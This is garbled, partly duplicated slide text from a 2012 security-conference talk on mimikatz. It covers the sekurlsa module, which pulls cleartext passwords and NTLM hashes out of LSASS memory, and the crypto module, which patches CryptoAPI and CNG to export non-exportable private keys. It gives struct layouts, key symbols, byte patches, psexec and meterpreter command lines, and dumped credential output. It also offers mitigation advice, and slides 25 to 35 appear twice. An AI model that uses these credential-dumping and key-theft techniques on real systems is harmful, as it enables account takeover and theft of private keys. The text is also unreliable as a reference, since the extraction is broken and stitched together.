1 kdgt uf c livesspLsaApLogonUserEx2livesspLsaApLogonUserEx2 (74781536)[]livesspLsaApLogonUserEx2+0x560 (74781a96)call to livesspLiveCreateLogonSession (74784867)
Our LiveSSP provider
Yeah Pass the Hash capability with Live account toohellip
Live user can logon through RDP via SSO
mimikatz sekurlsa livesspworkflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 25
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_LIVESSP_LIST_ENTRY struct _KIWI_LIVESSP_LIST_ENTRY Flinkstruct _KIWI_LIVESSP_LIST_ENTRY BlinkPVOID unk0PVOID unk1PVOID unk2PVOID unk3DWORD unk4DWORD unk5PVOID unk6LUID LocallyUniqueIdentifierLSA_UNICODE_STRING UserNamePVOID unk7PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds
KIWI_LIVESSP_LIST_ENTRY PKIWI_LIVESSP_LIST_ENTRY
livesspLiveGlobalLogonSessionList
search linked list for LUID
KIWI_LIVESSP_LIST_ENTRYKIWI_LIVESSP_PRIMARY_CREDENTIAL
typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL DWORD isSuppDWORD unk0LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_LIVESSP_PRIMARY_CREDENTIAL PKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa
Even if we already have tools for normal accounts are you not curious to test one with this trap
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 26
Me yes
mimikatz sekurlsa kerberos
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 27
lsasrvLsaProtectMemorykerberosKerbHideKeykerberosKerbCreatePrimaryCredentialskerberosKerbCreateLogonSessionkerberosSpAcceptCredentials
lsasrvLsaProtectMemorykerberosKerbHidePasswordkerberosKerbCreateLogonSessionkerberosSpAcceptCredentials
lsasrvLsaProtectMemorymsv1_0NlpAddPrimaryCredentialmsv1_0SspAcceptCredentialsmsv1_0SpAcceptCredentials
lsasrvLsaProtectMemorywdigestSpAcceptCredentials
lsasrvLsaProtectMemorytspkgTSHidePasswordtspkgSpAcceptCredentials
Kerberos part for password
Kerberos ticket part Maybe )
mimikatz sekurlsa kerberos (nt6)workflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 28
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_KERBEROS_PRIMARY_CREDENTIAL
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL
DWORD unk0PVOID unk1PVOID unk2PVOID unk3
ifdef _M_X64BYTE unk4[32]
elif defined _M_IX86BYTE unk4[20]
endifLUID LocallyUniqueIdentifier
ifdef _M_X64BYTE unk5[44]
elif defined _M_IX86BYTE unk5[36]
endifLSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_KERBEROS_PRIMARY_CREDENTIAL PKIWI_KERBEROS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
KIWI_KERBEROS_PRIMARY_CREDENTIAL
KerberosKerbGlobalLogonSessionTable
mimikatz sekurlsa kerberos (nt5)workflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 29
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_KERBEROS_LOGON_SESSION struct _KIWI_KERBEROS_LOGON_SESSION Flinkstruct _KIWI_KERBEROS_LOGON_SESSION Blink DWORD UsageCountPVOID unk0PVOID unk1PVOID unk2DWORD unk3DWORD unk4PVOID unk5PVOID unk6PVOID unk7LUID LocallyUniqueIdentifier
ifdef _M_IX86DWORD unk8
endifDWORD unk9DWORD unk10PVOID unk11DWORD unk12DWORD unk13PVOID unk14PVOID unk15PVOID unk16[hellip]LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_KERBEROS_LOGON_SESSION PKIWI_KERBEROS_LOGON_SESSION
kerberosKerbLogonSessionList
search linked list for LUID
KIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsademo time
Final sekurlsa demo sekurlsalogonPasswords full
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 30
mimikatz sekurlsa kerberosldquohu rdquo
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 31
mimikatz sekurlsa
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 32
LsaUnprotectMemory
mimikatz sekurlsaLsaEncryptMemory NT5
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKeyBYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsasrv
lsass
lsasrv
mimikatz
lsasrv
copyhellip
mimikatz sekurlsaLsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34
InitializationVector BYTE[16]
lsass
lsasrv
lsass
lsasrv
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD sizeDWORD tagDWORD typeDWORD unk0DWORD unk1DWORD unk2DWORD unk3PVOID unk4BYTE data etc
KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv typedef struct _KIWI_BCRYPT_KEY
DWORD sizeDWORD typePVOID unk0PKIWI_BCRYPT_KEY_DATA clePVOID unk1
KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsamemo
Security Packages
Protection Keys
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionListlsasrvLogonSessionListCount
LIST_ENTRYULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKeylsasrvg_pRandomKey
DESx lsasrvg_pDESXKeylsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsamemo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz
mimikatz privilegedebugDemande dACTIVATION du privilegravege SeDebugPrivilege OK
mimikatz sekurlsalogonPasswords full
Authentification Id 0234870Package dauthentification NTLMUtilisateur principal Gentil KiwiDomaine dauthentification vm-w8-rp-x
msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a
kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
livessp nt (LUID KO)
mimikatz sekurlsawhat we can do
Basicsndash No physical access to computer (first step to pass the hash then pass the pass)ndash No admin rights system rights debug privileges (hellip)ndash Disable local admin accountsndash Strong passwords (haha it was a joke so useless )ndash For privileged account network login instead of interactive (when possible)ndash Audit pass the hash keeps traces and can lock accountsndash No admin rights system rights debug privileges even VIPndash Use separated network (or forest) for privileged tasks
More in depthndash Force strong authentication (SmartCard amp Token) $ eurondash Short validity for Kerberos ticketsndash No delegationndash Disable NTLM (available with NT6)ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows)bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys ))ndash Let opportunities to stop retro compatibilityndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37
mimikatz cryptowhat is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeysbull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Exportbull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patchbull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38
mod_mimikatz_crypto
mimikatz cryptohow itrsquos protected
Private keys are DPAPI protectedndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened)ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39
Constraint for most userUnavailable for computer keys
certutil -importpfx mycertp12 NoExportcertutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capihow it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquondash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellipndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40
mimikatz crypto capihow itrsquos exported ( level)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapibecause I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42
mimikatz cryptoexportCertificatesEmplacement CERT_SYSTEM_STORE_CURRENT_USERMy
- Benjamin DelpyContainer Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03Provider Microsoft Enhanced Cryptographic Provider v10Type AT_KEYEXCHANGEExportabiliteacute NONTaille cleacute 2048Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO
(0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacuteExport public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BEObjet CN=Benjamin Delpy C=FRIl ne sagit pas dun certificat racineHach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03Fournisseur = Microsoft Enhanced Cryptographic Provider v10
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de cryptageCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapibecause I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapidemo time
Import export import as not exportablehellip export
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44
mimikatz crypto patchcapilimitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life usebull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45
mimikatz crypto cnghow it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquondash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellipndash It is but itrsquos not perfecthellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46
mimikatz crypto cnghow itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEMSYSTEM_MANDATORY_LABEL_NO_WRITE_UPSYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcngbecause sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48
mimikatz cryptoexportKeys[user] Cleacutes CNG
- cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Exportabiliteacute NONTaille cleacute 2048Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO
mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcngbecause sometimes I own LSASS
This time checks and keys are in LSASS processhellipAnd what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcngdemo time
Import export import as not exportablehellip export again
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50
mimikatz crypto patchcnglimitations
Patch operation needs some privilegesndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu )ndash certutil canhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51
mimikatz crypto patchcngbonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de chiffrementCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
Succegraves du test de chiffrementCertUtil -exportPFX La commande sest termineacutee correctement
mimikatz cryptomemo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keysndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53
mimikatz cryptowhat we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basicsndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depthndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSPbull Their biometrics stuff was a little buggy )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54
mimikatzwhat else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driverndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55
mimikatzthatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunitybull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challengesbull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56
Blog Source Code amp Contact
blog httpbloggentilkiwicommimikatz httpbloggentilkiwicommimikatzsource httpscodegooglecompmimikatzemail benjamingentilkiwicom
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
mimikatz sekurlsa livesspworkflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 25
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_LIVESSP_LIST_ENTRY struct _KIWI_LIVESSP_LIST_ENTRY Flinkstruct _KIWI_LIVESSP_LIST_ENTRY BlinkPVOID unk0PVOID unk1PVOID unk2PVOID unk3DWORD unk4DWORD unk5PVOID unk6LUID LocallyUniqueIdentifierLSA_UNICODE_STRING UserNamePVOID unk7PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds
KIWI_LIVESSP_LIST_ENTRY PKIWI_LIVESSP_LIST_ENTRY
livesspLiveGlobalLogonSessionList
search linked list for LUID
KIWI_LIVESSP_LIST_ENTRYKIWI_LIVESSP_PRIMARY_CREDENTIAL
typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL DWORD isSuppDWORD unk0LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_LIVESSP_PRIMARY_CREDENTIAL PKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa
Even if we already have tools for normal accounts are you not curious to test one with this trap
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 26
Me yes
mimikatz sekurlsa kerberos
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 27
lsasrvLsaProtectMemorykerberosKerbHideKeykerberosKerbCreatePrimaryCredentialskerberosKerbCreateLogonSessionkerberosSpAcceptCredentials
lsasrvLsaProtectMemorykerberosKerbHidePasswordkerberosKerbCreateLogonSessionkerberosSpAcceptCredentials
lsasrvLsaProtectMemorymsv1_0NlpAddPrimaryCredentialmsv1_0SspAcceptCredentialsmsv1_0SpAcceptCredentials
lsasrvLsaProtectMemorywdigestSpAcceptCredentials
lsasrvLsaProtectMemorytspkgTSHidePasswordtspkgSpAcceptCredentials
Kerberos part for password
Kerberos ticket part Maybe )
mimikatz sekurlsa kerberos (nt6)workflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 28
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_KERBEROS_PRIMARY_CREDENTIAL
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL
DWORD unk0PVOID unk1PVOID unk2PVOID unk3
ifdef _M_X64BYTE unk4[32]
elif defined _M_IX86BYTE unk4[20]
endifLUID LocallyUniqueIdentifier
ifdef _M_X64BYTE unk5[44]
elif defined _M_IX86BYTE unk5[36]
endifLSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_KERBEROS_PRIMARY_CREDENTIAL PKIWI_KERBEROS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
KIWI_KERBEROS_PRIMARY_CREDENTIAL
KerberosKerbGlobalLogonSessionTable
mimikatz sekurlsa kerberos (nt5)workflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 29
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_KERBEROS_LOGON_SESSION struct _KIWI_KERBEROS_LOGON_SESSION Flinkstruct _KIWI_KERBEROS_LOGON_SESSION Blink DWORD UsageCountPVOID unk0PVOID unk1PVOID unk2DWORD unk3DWORD unk4PVOID unk5PVOID unk6PVOID unk7LUID LocallyUniqueIdentifier
ifdef _M_IX86DWORD unk8
endifDWORD unk9DWORD unk10PVOID unk11DWORD unk12DWORD unk13PVOID unk14PVOID unk15PVOID unk16[hellip]LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_KERBEROS_LOGON_SESSION PKIWI_KERBEROS_LOGON_SESSION
kerberosKerbLogonSessionList
search linked list for LUID
KIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsademo time
Final sekurlsa demo sekurlsalogonPasswords full
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 30
mimikatz sekurlsa kerberosldquohu rdquo
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 31
mimikatz sekurlsa
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 32
LsaUnprotectMemory
mimikatz sekurlsaLsaEncryptMemory NT5
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKeyBYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsasrv
lsass
lsasrv
mimikatz
lsasrv
copyhellip
mimikatz sekurlsaLsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34
InitializationVector BYTE[16]
lsass
lsasrv
lsass
lsasrv
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD sizeDWORD tagDWORD typeDWORD unk0DWORD unk1DWORD unk2DWORD unk3PVOID unk4BYTE data etc
KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv typedef struct _KIWI_BCRYPT_KEY
DWORD sizeDWORD typePVOID unk0PKIWI_BCRYPT_KEY_DATA clePVOID unk1
KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsamemo
Security Packages
Protection Keys
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionListlsasrvLogonSessionListCount
LIST_ENTRYULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKeylsasrvg_pRandomKey
DESx lsasrvg_pDESXKeylsasrvg_Feedback
